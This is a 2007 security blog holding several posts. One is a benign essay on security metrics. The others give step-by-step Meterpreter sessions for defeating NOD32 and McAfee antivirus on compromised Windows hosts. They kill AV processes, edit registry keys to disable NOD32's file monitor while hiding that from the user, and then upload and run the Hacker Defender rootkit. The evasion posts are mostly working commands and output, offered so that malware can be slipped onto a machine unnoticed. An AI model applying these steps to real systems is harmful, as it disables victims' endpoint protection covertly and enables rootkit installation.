Friday, June 29, 2007

Defeating NOD32 AV

Ok I am going to claim victory over NOD32 but only on a technicality. But hey, I aint proud, I'll take it.

so if you upload any malware, nod32 like a good AV, will give you an alert (that's good)

meterpreter > upload hxdef100.exe hxdef100.exe

[*] uploading : hxdef100.exe -> hxdef100.exe

[*] uploaded : hxdef100.exe -> hxdef100.exe

meterpreter > ls


Listing: C:\WINDOWS\help\hxdef
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 .
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 ..



NOD32 AV alerting on Hacker Defender

NOD32 has srvhost restart itself immediately if you kill the process which is a real bummer.

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32kui.exe...

[*] Killing off nod32krn.exe...

or if you kill the process with PS

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
372 smss.exe \SystemRoot\System32\smss.exe
588 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
664 services.exe C:\WINDOWS\system32\services.exe
676 lsass.exe C:\WINDOWS\system32\lsass.exe
840 svchost.exe C:\WINDOWS\system32\svchost.exe
948 svchost.exe C:\WINDOWS\System32\svchost.exe
1128 svchost.exe C:\WINDOWS\System32\svchost.exe
1152 svchost.exe C:\WINDOWS\System32\svchost.exe
1332 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1760 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1768 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1852 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1892 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1920 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
312 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
2088 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 2088
Killing: 2088

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
348 smss.exe \SystemRoot\System32\smss.exe
580 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
604 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
656 services.exe C:\WINDOWS\system32\services.exe
668 lsass.exe C:\WINDOWS\system32\lsass.exe
832 svchost.exe C:\WINDOWS\system32\svchost.exe
940 svchost.exe C:\WINDOWS\System32\svchost.exe
1116 svchost.exe C:\WINDOWS\System32\svchost.exe
1168 svchost.exe C:\WINDOWS\System32\svchost.exe
1324 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1724 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1736 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1792 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1916 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1944 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
288 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
3880 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
1568 cmd.exe C:\WINDOWS\system32\cmd.exe
2404 regedit.exe C:\WINDOWS\regedit.exe


So how do we get malware on the box without alerting the user? and more specifically how do we get by the "AMON" which is the file monitor process.

NOD32 AV AMON file protection

I found that by editing some registry keys we can turn off the file protection.


meterpreter > reg
Usage: reg [command] [options]

Interact with the target machine's registry.

OPTIONS:

-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k ]
createkey Create the supplied registry key [-k ]
deletekey Delete the supplied registry key [-k ]
setval Set a registry value [-k -v -d ]
deleteval Delete the supplied registry value [-k -v ]
queryval Queries the data contents of a value [-k -v ]

meterpreter > reg enumkey -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings
Enumerating: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings

Values (23):

SP
enabled
check_on_open
check_on_rename
check_on_execute
check_on_create
quarantine_on_create
cache_enable
media_floppies
media_network
media_local
boot_on_access
boot_on_shutdown
sec_clean
sec_delete
sec_rename
sec_exclude
sec_replace
manualstop_enabled
autorun_dynamic
autoupd_notify
exc
exc_num

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled
Key: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings
Name: enabled
Type: REG_DWORD
Data: 1

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled -d 0
Successful set enabled.
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v startKey: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 2

meterpreter > reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start -t REG_DWORD -d "3"
Successful set start.
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v startKey: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 3


But if you disable AMON, your icon in the taskbar turns red and its grayed out in the control center of the AV (thats no good)

So to prevent that, we can change the registry key that loads the amon dll file. we change it so that NOD32 cant find that library, if it cant find the library it quitely loads the rest and doest provide any indication to the user that there is a problem, if you are looking for the AMON service you wont see it but it you arent looking for it you probably wont notice a problem.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filenameKey: HKLM\Software\eset\nod\currentversion\modules\AMON Name: filename Type: REG_SZ Data: C:\Program Files\Eset\ps_amon.dll
meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename -t REG_SZ -d "C:\\Program Files\\Eset\\ps_amon1.dll"
Successful set filename.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filenameKey: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon1.dll



meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > upload hxdef100.ini hxdef100.ini
[*] uploading : hxdef100.ini -> hxdef100.ini
[*] uploaded : hxdef100.ini -> hxdef100.ini
meterpreter > execute -f hxdef100.exe
Process 204 created.

All done :-)

Sunday, June 17, 2007

Sunday Comic Fun

Linux User At BestBuy...

website: http://imgs.xkcd.com/

Saturday, June 16, 2007

Antivirus and Rootkits part 2 -nod32

More on killing AV...

McAfee enterprise 8.x was kicking my butt with the killAV script so i decided to try NOD32 version 2.7. didnt go much better. it would at least kill the processes but the nod32krn.exe would just start back up automatically with a new PID :-(

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32krn.exe...
[*] Killing off nod32kui.exe...
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 3040
Killing: 3040
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3244 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

so it kills the GUI but its still running in the background. happily snatching up any malware you might be trying to upload. the user wont get the pop up but it will be sticking the malware back into quarantine. thats no good.

i'm now doing some research on changing some registry keys but it pretty much invovles rebooting the box and coming back to finish up which isnt a viable option in my opinion.

i'll post more on it later.

-CG

Thursday, June 14, 2007

Quantifying Security using Metrics

There is a great deal of valuable data that can be gained from the penetration test element of an assessment. Knowing whether or not your perimeter, for example, is secure and validating that knowledge is important. Looking at the scope of the assessments that I have recently been working on I think most people are looking to gain more than just an initial validation of their existing security controls.

Any good penetration test or vulnerability assessment will deliver a set of results that will include a listing of vulnerabilities and assign a risk value to those vulnerabilities along with some remediation measures. Most of these assessments will use the following calculations or variants thereof: Risk = Threat x Vulnerability or Risk = (Threat x Vulnerability) x Impact and Annual Loss Expectancy = Single Loss Expectancy x Annualized Rate of Occurrence. These calculations, while a great means of assessing risk, are usually applied to a risk management lifecycle that is circular and repeating .This, in my opinion, creates an environment in which risk is not being managed but is really just being identified and fixed and re-identified. This creates a reactive rather than proactive environment. Also, these calculations rely on values that are hard, if not impossible to define in all but the simplest of situations or scenarios.

Lets assume that after the installation of an IDS/IPS at your perimeter, you detected hotbar/spybar spyware traffic indicating that users on managed stations had local admin rights in order to be able to install the malware. Using this information you were able to assess your current controls and determine why they had admin rights and take steps to fix it. While the product has proved it’s worth, it was a reactive response to an issue. Ideally being able to define a set of metrics by which to measure the security of the host’s configuration would allow you to better define, assess and improve the security controls you have in place. By tracking this data over time you can move towards a more proactive environment.

Using the example of Host Configuration Management I would look to achieve the following:

A Benchmark score for Workstations/Laptops/Servers. - This allows you to standardize configurations and characterize the degree of lockdown applied to the OS.

The percentage of Workstations/Laptops/Servers using the standard build image. - This allows you to measure the conformance of systems in your environment to the standard build.

The percentage of systems in compliance with the standard configuration. - This shows how many systems conform to the standard build requirements regardless of how the system was build (manual, image, etc..)

The network services ratio. - This identifies potential ingress points on the hosts. Tracking unnecessary/vulnerable services that should be disabled allows you to determine the number or percentage of systems deviating from your standard build as well as potential ingress points or vulnerable systems. This data can also be applied to your patch management processes in order to prioritize which systems require immediate patching, etc...

The percentage of systems that are remotely managed. - This would identify the systems that can be administered remotely and are subject to patch management and anti-malware controls.

The percentage of critical systems actively being monitored. - This helps identify the extent of uptime and monitoring controls in place.

The number/percentage of systems logging events remotely. - This determines how many systems are forwarding security event data to a central log server.

The number/percentage of systems using NTP server for time synchronization. - This and the previous two metrics are important for Incident Handling response. When an incident occurs and the event information needs to be accessed, having this data in a central location ensures access and integrity of those events. Time synchronization is important when reconstruction a sequence of events in the correct order.

The response time to (re)configure a system in an emergency. -This tracks the response time to reconfigure a set of systems in event of a zero-day attack or incident. This should ideally be organized by OS, Department, location.

Having a set of metrics that are easy to gather, repeatable, can be expressed as a number or percentage and are relevant to your environment, will help with analysis and allow you to become far more proactive.

Quantitative metrics like these can be applied to multiple areas of control, including the results of a penetration test of vulnerability assessment. Some metrics that would have immediate value would be:

Perimeter Security (Anti-virus/spam/malware, Firewalls, IDS/IPS) and Threats/Attacks (Events and Incidents).
Coverage and Control (Vuln/patch management, AV management, Host management). These determine effectiveness and success of your existing security program.
Availability and Reliability (Uptime, recovery, change control).
Application/Web application security.
Penetration Testing/Vulnerability assessments. These can provide valuable data but need to be defined by your environment. Identifying and defining issues by departments, looking at the difficulty of the exploit (remote or requires local access, etc...), assessing the impact of the vulnerability in terms of your existing security controls (defense in depth).

These are all predominantly technical in nature but the same methodology could be applied to assessing user awareness and compliance. I think that regardless of what you decide to have assessed, looking to gain valuable and repeatable metrics from results should be the outcome.

A great read on Security Metrics, and where most of the above content is from, is Andrew Jaquith's book Security Metrics. It's an excellent read and is extremely relevant in today's maturing security environments.

Cheers,
Dean

Tuesday, June 5, 2007

Antivirus and Rootktis

So i was working on a article on using HackerDefender rootkit. Hopefully it will be published soon, i'll update on that when/if it happens. During the course of doing the demo for it i wanted to see how the metasploit killAV meterpeter script would do against mcaffee. it didnt do well at all, the mcaffee AV had something running that i couldnt turn it off using that script or with task manager, but if you turned off the "on protect" you could run the script and kill the rest of the AV on the box. of further interest and calls for more research is the stack overflow prevention that stopped a simple metasploit attack cold :-( i'm gonna play and see if there are ways around that either with encoding or if it protects against heap overflows.

anyway, assuming they dont have the stack protection on and you can get a shell, the easiest thing may be a vnc payload where you can just disable the AV by hand (virtual hand) and then upload your rootkit on the box. that brings the whole someone may see you doing it issue but will still get the job done.

more to follow if the ADD doesnt kick in too bad and i get off on a different tangent.

-CG